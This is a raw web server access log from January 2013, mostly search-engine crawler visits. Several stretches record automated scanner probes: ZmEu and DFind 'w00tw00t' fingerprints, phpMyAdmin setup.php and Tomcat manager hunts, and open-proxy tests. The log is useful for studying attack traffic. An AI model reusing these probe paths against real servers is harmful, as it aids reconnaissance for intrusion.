193.142.62.64 - - [22/Jan/2013:13:15:50 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:15:59 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:07 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:15 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:24 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:32 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:40 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:48 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
193.142.62.64 - - [22/Jan/2013:13:16:56 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
84.151.6.49 - - [22/Jan/2013:15:39:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
141.8.147.1 - - [22/Jan/2013:15:58:18 +0100] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.213.73 - - [22/Jan/2013:16:21:37 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [22/Jan/2013:16:21:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
176.9.148.197 - - [22/Jan/2013:20:25:50 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.148.197 - - [22/Jan/2013:20:25:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
178.218.30.228 - - [22/Jan/2013:21:13:21 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 329 "-" "-"
141.8.147.1 - - [22/Jan/2013:21:24:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.24.239 - - [22/Jan/2013:22:01:20 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.239 - - [22/Jan/2013:22:03:13 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.255.215.74 - - [22/Jan/2013:23:20:54 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.74 - - [22/Jan/2013:23:20:54 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
130.149.225.142 - - [23/Jan/2013:00:31:26 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "MiaDev/0.0.1 (MIA Bot for research project MIA (www.MIA-marktplatz.de); http://www.mia-marktplatz.de/spider; spider@mia-marktplatz.de)"
130.149.225.142 - - [23/Jan/2013:00:31:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "MiaDev/0.0.1 (MIA Bot for research project MIA (www.MIA-marktplatz.de); http://www.mia-marktplatz.de/spider; spider@mia-marktplatz.de)"
91.194.201.59 - - [23/Jan/2013:03:22:42 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:42 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:42 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:42 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:43 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:43 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:43 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
91.194.201.59 - - [23/Jan/2013:03:22:43 +0100] "GET /manager/html HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2;)"
65.55.52.116 - - [23/Jan/2013:06:14:15 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.116 - - [23/Jan/2013:06:16:42 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
198.58.99.140 - - [23/Jan/2013:07:49:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"
209.190.1.133 - - [23/Jan/2013:07:51:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
5.9.7.208 - - [23/Jan/2013:07:55:46 +0100] "GET /careers.html HTTP/1.0" 404 326 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [23/Jan/2013:07:56:14 +0100] "GET /company.html HTTP/1.0" 404 326 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
206.253.226.23 - - [23/Jan/2013:08:59:48 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
157.55.35.82 - - [23/Jan/2013:09:35:12 +0100] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.82 - - [23/Jan/2013:09:36:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.246.165.210 - - [23/Jan/2013:11:28:30 +0100] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [23/Jan/2013:11:28:30 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlberlin-ufb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.190 - - [23/Jan/2013:11:38:08 +0100] "GET /robots.txt HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.190 - - [23/Jan/2013:11:38:09 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferungen-pwb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.200 - - [23/Jan/2013:12:11:43 +0100] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.200 - - [23/Jan/2013:12:11:43 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlpreiseberlin-2zb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.170 - - [23/Jan/2013:12:18:46 +0100] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.170 - - [23/Jan/2013:12:18:47 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--essohndler-u5a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [23/Jan/2013:12:27:17 +0100] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [23/Jan/2013:12:27:17 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferantberlin-69b.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
209.190.1.131 - - [23/Jan/2013:13:51:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1) KomodiaBot/1.0"
141.8.147.1 - - [23/Jan/2013:13:52:59 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.35.90 - - [23/Jan/2013:15:06:26 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.90 - - [23/Jan/2013:15:09:07 +0100] "GET /seiten/optiplus_detail.php?det=lager HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
216.145.5.42 - - [23/Jan/2013:15:11:32 +0100] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.5.42 - - [23/Jan/2013:15:11:32 +0100] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--premiuml-t4a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
23.20.116.7 - - [23/Jan/2013:16:25:50 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
141.8.147.1 - - [23/Jan/2013:17:43:01 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [23/Jan/2013:17:45:48 +0100] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [23/Jan/2013:17:45:57 +0100] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.27.74 - - [23/Jan/2013:18:03:58 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
5.9.27.74 - - [23/Jan/2013:18:03:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
92.240.68.153 - - [23/Jan/2013:19:12:29 +0100] "GET http://www.starbacks.ca/HotSprings/1775/diana.jpg HTTP/1.1" 404 333 "-" "webcollage/1.135a"
141.8.147.1 - - [23/Jan/2013:19:59:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.77.126.55 - - [23/Jan/2013:22:30:33 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [23/Jan/2013:22:30:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
84.151.6.110 - - [24/Jan/2013:00:11:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:17 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:25 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:31 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:31 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:31 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:31 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
190.219.200.248 - - [24/Jan/2013:00:42:31 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
194.153.113.7 - - [24/Jan/2013:03:36:06 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
141.8.147.1 - - [24/Jan/2013:11:13:22 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.1 - - [24/Jan/2013:11:16:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [24/Jan/2013:13:13:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.25.116 - - [24/Jan/2013:13:15:08 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.25.116 - - [24/Jan/2013:13:15:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.47.18 - - [24/Jan/2013:13:24:31 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.47.18 - - [24/Jan/2013:13:24:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.25.116 - - [24/Jan/2013:13:25:10 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.25.116 - - [24/Jan/2013:13:25:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.47.18 - - [24/Jan/2013:13:26:42 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.47.18 - - [24/Jan/2013:13:26:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.71.70 - - [24/Jan/2013:13:37:26 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.71.70 - - [24/Jan/2013:13:37:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [24/Jan/2013:14:08:14 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [24/Jan/2013:14:08:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.25.246.225 - - [24/Jan/2013:14:10:59 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.25.246.225 - - [24/Jan/2013:14:11:11 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
66.249.78.97 - - [24/Jan/2013:14:15:16 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.97 - - [24/Jan/2013:14:15:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
188.40.47.18 - - [24/Jan/2013:14:36:15 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
188.40.47.18 - - [24/Jan/2013:14:36:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [24/Jan/2013:14:39:31 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
46.4.67.68 - - [24/Jan/2013:14:39:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.25.246.225 - - [24/Jan/2013:15:12:14 +0100] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.25.246.225 - - [24/Jan/2013:15:12:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
94.102.51.246 - - [24/Jan/2013:16:09:00 +0100] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7jy745aa00143SSQJ_W_EFBF%5CD HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
141.8.147.1 - - [24/Jan/2013:18:32:18 +0100] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
206.253.226.23 - - [24/Jan/2013:19:13:54 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
23.20.116.7 - - [24/Jan/2013:20:14:50 +0100] "GET / HTTP/1.0" 200 1229 "http://www.eatree.com" "-"
141.8.147.1 - - [25/Jan/2013:02:55:41 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.1 - - [25/Jan/2013:03:00:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [25/Jan/2013:04:11:57 +0100] "GET /index.php?option=com_content&view=article&id=2&Itemid=3 HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [25/Jan/2013:04:12:20 +0100] "GET /index.php?option=com_content&view=article&id=4&Itemid=5 HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [25/Jan/2013:04:12:22 +0100] "GET /index.php?option=com_content&view=article&id=6&Itemid=7 HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [25/Jan/2013:04:12:25 +0100] "GET /index.php?option=com_content&view=article&id=7&Itemid=8 HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [25/Jan/2013:05:56:33 +0100] "GET /robots.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [25/Jan/2013:06:31:10 +0100] "GET /tools/boerse/einzelkurs_kurse.htm?s=ILMN&b=16&l=840&n=ILLUMINA%20INC HTTP/1.0" 404 347 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.17.29.107 - - [25/Jan/2013:06:49:15 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
85.17.29.107 - - [25/Jan/2013:06:49:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:32 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:33 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
208.96.134.5 - - [25/Jan/2013:06:49:33 +0100] "GET /languages/flags/ptt_bbrr.gif HTTP/1.1" 400 329 "-" "-"
141.8.147.1 - - [25/Jan/2013:07:42:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [25/Jan/2013:10:31:47 +0100] "GET /top.php?d=helpcenter.com HTTP/1.0" 404 317 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
157.55.35.113 - - [25/Jan/2013:10:54:58 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.113 - - [25/Jan/2013:10:57:12 +0100] "GET /index.htm HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
